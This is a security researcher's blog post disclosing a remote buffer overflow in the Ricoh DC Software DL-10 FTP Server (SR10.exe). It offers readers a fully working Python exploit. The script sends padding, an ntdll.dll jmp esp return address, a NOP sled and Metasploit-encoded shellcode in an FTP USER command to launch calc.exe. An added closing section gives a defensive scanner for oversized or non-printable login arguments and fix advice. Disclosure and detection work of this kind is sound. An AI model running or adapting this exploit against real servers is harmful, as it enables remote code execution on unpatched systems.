Julien Ahrens === @MrTuxracer

Vulnerability Intel | ROP Gadget Hunter | Privacy Enthusiast | Full-time BugBounty hunter | @Hacker0x01 MVH | @SynackRedTeam member | on a world-trip

Ricoh DC Software DL-10 FTP Server (SR10.exe)

21 Mar 2012 » RCE, Exploit, Advisory

This time I’ve found a more critical vulnerability with a CVSSv2 score of 7.5, coordinated by Secunia.com, which was already published on 2012-03-01. Due to a very unfortunate way of communication by Secunia, I was not informed about the release of the advisory - that’s the reason for the late article on it :-(

But anyway, this vulnerability is a perfect example of how not to react to confidentially reported security issues: Ricoh did not respond to any of Secunia’s notifications since my discovery and reporting of the bug on 2012-02-05. Even if it’s not one of their flagship products, there are always customers who take care of their entire network security and who don’t like security breaches at all! Let’s hope that they’ll fix the issue after the full disclosure, which by the way works perfectly in situations like this.

@Ricoh: If you read this and have further questions regarding the bug, do not hesitate to contact me!

You can review the full advisory here.

And exclusively for Inshell.net readers, here’s a fully working exploit for Windows XP which will simply launch calc.exe on the remote side:

#!/usr/bin/python

# Exploit Title: Ricoh DC Software DL-10 FTP Server (SR10.exe) <= 1.1.0.6 Remote Buffer Overflow Vulnerability
# Version:       <= 1.1.0.6
# Date:          2012-02-05
# Author:        Julien Ahrens
# Homepage:      www.inshell.net
# Software Link: http://www.ricohpmmc.com
# Tested on:     Windows XP SP3 Professional German
# Notes:         Capftpd (former SR-10) is vulnerable too
# Howto:         "Log file name" has to be set

# Python 2 script: the payload is assembled as a plain byte string (str)
from struct import pack
import socket,sys

target="192.168.0.1"
port=21

junk = "\x41" * 245
eip = pack('<L',0x7C92FCD8) #jmp esp from ntdll.dll
nops = "\x90" * 20

# windows/exec CMD=calc.exe
# Encoder: x86/shikata_ga_nai
# powered by Metasploit
# msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00\x0a\x0d'

shellcode = ("\xdd\xc1\xbb\x45\x1d\x9a\xae\xd9\x74\x24\xf4\x5d\x2b\xc9" +
"\xb1\x33\x31\x5d\x17\x83\xed\xfc\x03\x18\x0e\x78\x5b\x5e" +
"\xd8\xf5\xa4\x9e\x19\x66\x2c\x7b\x28\xb4\x4a\x08\x19\x08" +
"\x18\x5c\x92\xe3\x4c\x74\x21\x81\x58\x7b\x82\x2c\xbf\xb2" +
"\x13\x81\x7f\x18\xd7\x83\x03\x62\x04\x64\x3d\xad\x59\x65" +
"\x7a\xd3\x92\x37\xd3\x98\x01\xa8\x50\xdc\x99\xc9\xb6\x6b" +
"\xa1\xb1\xb3\xab\x56\x08\xbd\xfb\xc7\x07\xf5\xe3\x6c\x4f" +
"\x26\x12\xa0\x93\x1a\x5d\xcd\x60\xe8\x5c\x07\xb9\x11\x6f" +
"\x67\x16\x2c\x40\x6a\x66\x68\x66\x95\x1d\x82\x95\x28\x26" +
"\x51\xe4\xf6\xa3\x44\x4e\x7c\x13\xad\x6f\x51\xc2\x26\x63" +
"\x1e\x80\x61\x67\xa1\x45\x1a\x93\x2a\x68\xcd\x12\x68\x4f" +
"\xc9\x7f\x2a\xee\x48\x25\x9d\x0f\x8a\x81\x42\xaa\xc0\x23" +
"\x96\xcc\x8a\x29\x69\x5c\xb1\x14\x69\x5e\xba\x36\x02\x6f" +
"\x31\xd9\x55\x70\x90\x9e\xaa\x3a\xb9\xb6\x22\xe3\x2b\x8b" +
"\x2e\x14\x86\xcf\x56\x97\x23\xaf\xac\x87\x41\xaa\xe9\x0f" +
"\xb9\xc6\x62\xfa\xbd\x75\x82\x2f\xde\x18\x10\xb3\x0f\xbf" +
"\x90\x56\x50")

payload = junk + eip + nops + shellcode

print "[*] Connecting to Target " + target + "..."

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((target, port))
    print "[*] Connected to " + target + "!"
except socket.error:
    print "[!] " + target + " didn't respond\n"
    sys.exit(0)

s.recv(1024)
print "[*] Sending malformed request..."
s.send('USER ' + payload + '\r\n')

print "[!] Exploit has been sent!\n"
s.close()
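From the defender's side, the request above is easy to spot on the wire: a single USER command whose argument is hundreds of bytes long and full of non-printable machine code. The following Python 3 script is an added example, not part of the original post or of the Ricoh software, that parses FTP control-channel lines and flags USER/PASS arguments that are oversized or contain control bytes. The length threshold, the function names and the sample session are all constructed here; only the 245-byte padding figure it refers to comes from the exploit above.

```python
import re

# Assumed threshold (not from the advisory): real usernames are short, and the
# overflow in the post needs 245 bytes of padding before the saved return
# address is even reached, so anything above this is worth an alert.
MAX_USER_ARG_LEN = 128

# Verb followed by an optional single-space-separated argument (RFC 959 style).
FTP_CMD_RE = re.compile(rb'^([A-Za-z]{3,4})(?: (.*))?$')


def parse_ftp_command(line):
    """Split one stripped FTP control-channel line into (VERB, argument bytes)."""
    m = FTP_CMD_RE.match(line)
    if not m:
        return None
    verb = m.group(1).upper().decode('ascii')
    arg = m.group(2) or b''
    return verb, arg


def inspect_command(raw_line, max_len=MAX_USER_ARG_LEN):
    """Return a finding dict if the line looks like an overflow attempt, else None."""
    line = raw_line.rstrip(b'\r\n')
    parsed = parse_ftp_command(line)
    if parsed is None:
        return {'reason': 'unparseable', 'preview': line[:32]}
    verb, arg = parsed
    if verb in ('USER', 'PASS'):
        if len(arg) > max_len:
            return {'reason': 'oversized_argument', 'verb': verb, 'length': len(arg)}
        if any(b < 0x20 or b > 0x7e for b in arg):
            # Usernames are printable ASCII; injected machine code is not.
            return {'reason': 'non_printable_argument', 'verb': verb, 'length': len(arg)}
    return None


def scan_session(lines, max_len=MAX_USER_ARG_LEN):
    """Run inspect_command over raw lines and tag each finding with its line number."""
    findings = []
    for lineno, raw_line in enumerate(lines, 1):
        finding = inspect_command(raw_line, max_len)
        if finding is not None:
            finding['lineno'] = lineno
            findings.append(finding)
    return findings


# Constructed sample control-channel session (not a real capture).
SAMPLE_SESSION = [
    b'USER anonymous\r\n',
    b'PASS guest@example.invalid\r\n',
    b'PWD\r\n',
    b'USER ' + b'A' * 300 + b'\r\n',      # oversized argument
    b'USER bob\x00\x90\r\n',              # control bytes inside the argument
    b'QUIT\r\n',
    b'\xff\xfe\xff\r\n',                  # not an FTP command at all
]

if __name__ == '__main__':
    for finding in scan_session(SAMPLE_SESSION):
        print(finding)
```

The same checks map directly onto an IDS rule (FTP USER/PASS argument length plus a non-printable-byte test), and the server-side fix is the mirror image: bound the length of the login argument before it is ever copied into the fixed-size buffer that the log-file handling writes to.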